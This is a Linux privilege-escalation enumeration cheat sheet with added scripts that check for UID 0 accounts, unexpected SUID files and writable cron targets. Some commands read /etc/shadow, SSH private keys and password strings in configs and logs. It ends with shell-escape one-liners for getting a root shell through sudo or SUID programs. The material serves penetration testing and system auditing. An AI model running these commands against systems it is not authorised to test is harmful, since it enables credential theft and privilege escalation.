opexxx

linuxenumeration

Feb 25th, 2015
Kernel, Operating System & Device Information:
Command     Result
uname -a    Print all available system information
uname -r    Kernel release
uname -n    System hostname
hostname    As above
uname -m    Machine hardware name, i.e. the kernel architecture (x86_64, i686, aarch64 etc.)
cat /proc/version   Kernel version and the compiler it was built with
cat /etc/*-release  Distribution information
cat /etc/issue  As above
cat /proc/cpuinfo   CPU information
df -a   Mounted file systems (including pseudo file systems) and their space usage


Users & Groups:
Command     Result
cat /etc/passwd     List all users on the system
cat /etc/group  List all groups on the system
for i in $(cut -d: -f1 /etc/passwd 2>/dev/null); do id "$i"; done 2>/dev/null    List all UIDs and respective group memberships
cat /etc/shadow     Show user hashes – Privileged command
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }'     List all super user accounts (UID 0); anything other than root is worth a closer look
finger  Users currently logged in
pinky   As above
users   As above
who -a  As above
w   Who is currently logged in and what they're doing
last    Listing of last logged on users
lastlog     Information on when all users last logged in
lastlog -u %username%     Information on when the specified user last logged in
lastlog | grep -v "Never"    Entire list of users that have previously logged in


User & Privilege Information:
Command     Result
whoami  Current username
id  Current user information
cat /etc/sudoers    Who's allowed to do what as root – Privileged command
sudo -l     Can the current user perform anything as root
sudo -l 2>/dev/null | grep -wE 'nmap|perl|awk|find|bash|sh|man|more|less|vi|vim|nc|netcat|python|ruby|lua|irb' | xargs -r ls -la 2>/dev/null     Can the current user run any 'interesting' binaries as root and if so also display the binary permissions etc. (rough: xargs also receives the "(ALL)" and "NOPASSWD:" tokens on matching lines; the ls errors for those are discarded)


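The UID 0 check from the Users & Groups section and the "interesting sudo targets" check above, scripted so that only file paths reach ls. This is an added example, not part of the original cheat sheet; the passwd sample and the sudo -l sample used to exercise it are constructed, and the INTERESTING list of shell-escape candidates is an assumption to extend as needed.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: script the "who is UID 0"
# check from the Users & Groups section and the "interesting sudo targets" check
# from the User & Privilege section. The INTERESTING list is an assumption.

# Accounts whose UID is 0. A second root-equivalent account ("toor", or a
# renamed service account) is a classic backdoor, so anything but "root" here
# is worth noting. $1 is the passwd file to read (default /etc/passwd).
uid0_accounts() {
  awk -F: '!/^#/ && $3 == 0 { print $1 }' "${1:-/etc/passwd}"
}

# Accounts with a usable login shell, printed as name:uid:shell. Service
# accounts that were given /bin/sh or /bin/bash instead of nologin are
# candidates for lateral movement once you hold a credential or key.
login_accounts() {
  awk -F: '!/^#/ && $7 !~ /(nologin|false)$/ { print $1 ":" $3 ":" $7 }' "${1:-/etc/passwd}"
}

# Read "sudo -l" output on stdin and print only the absolute paths of
# permitted commands whose basename is a known shell-escape candidate.
# Unlike the grep|xargs one-liner in the cheat sheet, nothing but paths is
# emitted, so tokens such as "(ALL : ALL)" or "NOPASSWD:" never reach ls.
# Rule lines in sudo -l output start with the "(runas)" specification;
# a trailing comma separates several commands on one rule line.
INTERESTING='nmap|perl|awk|find|bash|sh|dash|man|more|less|vi|vim|nc|netcat|python[0-9.]*|ruby|lua|irb'
sudo_interesting() {
  awk '/^[ \t]*\(/ { for (i = 1; i <= NF; i++) if ($i ~ /^\//) print $i }' \
    | sed 's/,$//' \
    | grep -E "/($INTERESTING)$" || true
}

# Stand-alone use: run the checks against the live system.
echo "== UID 0 accounts =="
uid0_accounts
echo "== accounts with a login shell =="
login_accounts
echo "== sudo targets with a known shell escape (-n: never prompt) =="
sudo -n -l 2>/dev/null | sudo_interesting | xargs -r ls -la 2>/dev/null
```

Each path printed by sudo_interesting is a program that can be run as the rule's runas user; look it up in the shell escape list at the end of the page.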
Environment Information:
Command     Result
env     Display environment variables
set     As above (also lists shell variables and functions)
echo $PATH  Path information
history     Displays command history of current user
pwd     Print working directory, i.e. 'where am I'
cat /etc/profile    Display default system variables
cat /etc/shells     Display available shells


Interesting Files:
Command     Result
find / -perm -4000 -type f 2>/dev/null  Find SUID files
find / -uid 0 -perm -4000 -type f 2>/dev/null   Find SUID files owned by root
find / -perm -2000 -type f 2>/dev/null  Find SGID files
find / -perm -2 -type f 2>/dev/null     Find world-writable files
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null   Find world-writable files excluding those in /proc
find / -perm -2 -type d 2>/dev/null     Find world-writable directories
find /home -name "*.rhosts" -print 2>/dev/null  Find rhosts config files
find /home -iname "*.plan" -exec ls -la {} \; -exec cat {} 2>/dev/null \;     Find *.plan files, list permissions and cat the file contents
find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;     Find hosts.equiv, list permissions and cat the file contents
ls -ahlR /root/     See if you can access other users' directories to find interesting files
cat ~/.bash_history     Show the current user's command history
ls -la ~/.*_history     Show the current user's various history files
ls -la /root/.*_history     Can we read root's history files
ls -la ~/.ssh/  Check for interesting ssh files in the current user's directory
find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null | xargs -r ls -la    Find SSH keys/host information
ls -la /usr/sbin/in.*   List the inetd service binaries that are installed (in.telnetd, in.ftpd etc.)
grep -l -i pass /var/log/*.log 2>/dev/null  Check log files for keywords ('pass' in this example) and show positive matches
find /var/log -type f -exec ls -la {} \; 2>/dev/null    List files in specified directory (/var/log)
find /var/log -name "*.log" -type f -exec ls -la {} \; 2>/dev/null    List .log files in specified directory (/var/log)
find /etc/ -maxdepth 1 -name "*.conf" -type f -exec ls -la {} \; 2>/dev/null  List .conf files in /etc (recursive 1 level)
ls -la /etc/*.conf  As above
find / -maxdepth 4 -name "*.conf" -type f -exec grep -Hn password {} \; 2>/dev/null   Find .conf files (recursive 4 levels) and output the line number where the word 'password' is located
lsof -i -n  List open network sockets and the processes holding them (output will depend on account privileges)
head /var/mail/root     Can we read root's mail


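The SUID/SGID find one-liners above return dozens of legitimate binaries on any normal install, so the useful step is to compare the list against a baseline and look only at what is new. The script below is an added example, not part of the original cheat sheet; the baseline format (one absolute path per line, captured from a clean install of the same release) and the sample file names in the test are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: turn the SUID/SGID find
# one-liners into a comparison against a baseline list, so a newly added or
# planted set-id binary stands out. The baseline file format is an assumption.

# Every setuid or setgid regular file below $1 (default /), sorted.
# -perm -4000 / -2000 match files with that bit set whatever the other bits
# are; /proc is pruned because it is slow to walk and never holds real files.
setid_files() {
  find "${1:-/}" -path /proc -prune -o -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# The subset that matters most for privilege escalation: setuid and owned by
# root. A setuid binary owned by an unprivileged user only gets you that user.
root_setuid_files() {
  find "${1:-/}" -path /proc -prune -o -type f -uid 0 -perm -4000 -print 2>/dev/null | sort
}

# Set-id files below $1 that are not listed in the baseline file $2.
# Capture the baseline once from a clean install (setid_files > baseline.txt);
# anything printed here deserves ls -la, strings/ldd and a check against the
# shell escape list at the end of the page.
setid_unexpected() {
  [ -r "$2" ] || { echo "baseline $2 not readable" >&2; return 1; }
  setid_files "$1" | grep -vxF -f "$2" || true
}

# Stand-alone use: ./setid_check.sh BASELINE_FILE [ROOT_DIR]
case $# in
  0) echo "usage: $0 BASELINE_FILE [ROOT_DIR]" >&2 ;;
  *) setid_unexpected "${2:-/}" "$1" | xargs -r ls -la 2>/dev/null ;;
esac
```

An empty baseline simply reports every set-id file, which is the same result as the cheat sheet's one-liner; the value is in keeping a baseline per distribution release and diffing against it on each host.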
Service Information:
Command     Result
ps aux | grep root  View processes running as root (also matches any command line containing 'root', including the grep itself)
ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++'  Lookup process binary path and permissions (duplicates removed)
cat /etc/inetd.conf     List services managed by inetd
cat /etc/xinetd.conf    As above for xinetd (per-service definitions usually live in /etc/xinetd.d/)
cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' | xargs -r ls -la 2>/dev/null    A very 'rough' command to extract associated binaries from xinetd.conf and show permissions of each
ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null   Permissions and contents of /etc/exports (NFS)


Jobs/Tasks:
Command     Result
crontab -l -u %username%    Display scheduled jobs for the specified user – Privileged command
ls -la /etc/cron*   Scheduled jobs overview (hourly, daily, monthly etc)
ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null   What can 'others' write in /etc/cron* directories
top     List of current tasks


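The cron check above looks at the permissions of the /etc/cron* directories themselves. What usually decides a privilege escalation is whether the scripts the cron entries run (often elsewhere, e.g. /opt or /usr/local/bin) are writable, since cron executes them as the user named in the entry, normally root. The script below is an added example, not part of the original cheat sheet; the crontab lines used to exercise it are constructed.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: find cron targets that
# the current user (or anyone) could replace. Sample crontab lines are
# constructed for illustration.

# Print the absolute path of the program each crontab line runs: the first
# token that starts with "/". That covers user crontabs (5 time fields plus
# command), system crontabs (6 fields, with a user column) and @reboot-style
# entries; comments and VAR=value lines yield nothing. It is deliberately
# rough: a command such as "cd /var/lib && ./job.sh" reports /var/lib.
cron_targets() {
  grep -v '^[[:space:]]*#' | awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^\//) { print $i; break } }'
}

# True if $1 is group- or world-writable, judged from the mode bits (so the
# answer does not depend on who runs the check). ls -ld output starts with
# something like -rwxrwxr-x; the 6th and 9th characters are the group and
# other write bits.
writable_by_others() {
  m=$(ls -ld "$1" | cut -c1-10)
  case "$m" in
    ?????w*|????????w?) return 0 ;;
    *) return 1 ;;
  esac
}

# Read crontab lines on stdin and report each target that is missing,
# writable, or sits in a writable directory. A writable parent is enough:
# the script can be swapped by rename even when it is read-only itself.
# A missing target is reported too, since creating it may be possible.
loose_cron_targets() {
  cron_targets | sort -u | while IFS= read -r p; do
    if [ ! -e "$p" ]; then
      echo "$p MISSING"
    elif writable_by_others "$p"; then
      echo "$p WRITABLE"
    elif writable_by_others "$(dirname "$p")"; then
      echo "$p PARENT-WRITABLE"
    fi
  done
}

# Stand-alone use: system crontab, drop-ins, and the current user's crontab.
{ cat /etc/crontab /etc/cron.d/* 2>/dev/null; crontab -l 2>/dev/null; } | loose_cron_targets
```

Scripts in /etc/cron.hourly, cron.daily and so on are run by run-parts rather than named in a crontab line, so for those directories the cheat sheet's ls -aRl check still applies: pipe `find /etc/cron.* -type f` through the same writable_by_others test if you want both in one pass.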
Networking, Routing & Communications:
Command     Result
/sbin/ifconfig -a   List all network interfaces
cat /etc/network/interfaces     As above (Debian-style static interface configuration)
arp -a  Display the ARP cache, i.e. hosts this machine has recently talked to
route   Display route information
cat /etc/resolv.conf    Show configured DNS server addresses
netstat -antp   List all TCP sockets and related PIDs (-p Privileged command for other users' processes)
netstat -anup   List all UDP sockets and related PIDs (-p Privileged command)
iptables -L     List firewall rules – Privileged command
cat /etc/services   View port numbers/services mappings


Programs Installed:
Command     Result
dpkg -l     Installed packages (Debian)
rpm -qa     Installed packages (Red Hat)
sudo -V     Sudo version – does an exploit exist?
httpd -v    Apache version
apache2 -v  As above
apache2ctl (or apachectl) -M    List loaded Apache modules
mysql --version     Installed MySQL version details
psql -V     Installed Postgres version details
perl -v     Installed Perl version details
java -version   Installed Java version details
python --version    Installed Python version details
ruby -v     Installed Ruby version details
find / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc)   Locate 'useful' programs (netcat, wget etc)
which %program_name% (i.e. nc, netcat, wget, nmap etc)  As above
dpkg --list 2>/dev/null | grep compiler | grep -v decompiler 2>/dev/null; yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null   List available compilers (the two halves are joined with ';' rather than '&&' so the yum check still runs on hosts without dpkg)
cat /etc/apache2/envvars 2>/dev/null | grep -i 'user\|group' | awk '{sub(/.*export /,"")}1'    Which account is Apache running as


Common Shell Escape Sequences:
These matter once sudo -l or a SUID bit lets you run one of the programs below as another user: the spawned shell runs with that user's privileges (with a SUID binary, start bash with -p, otherwise it drops the effective UID).
Command     Program(s)
:!bash  vi, vim
:set shell=/bin/bash:shell  vi, vim
!bash   man, more, less
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;  find
awk 'BEGIN {system("/bin/bash")}'   awk
--interactive   nmap (old releases only, roughly 2.02 to 5.21; later versions dropped interactive mode)
perl -e 'exec "/bin/bash";'     Perl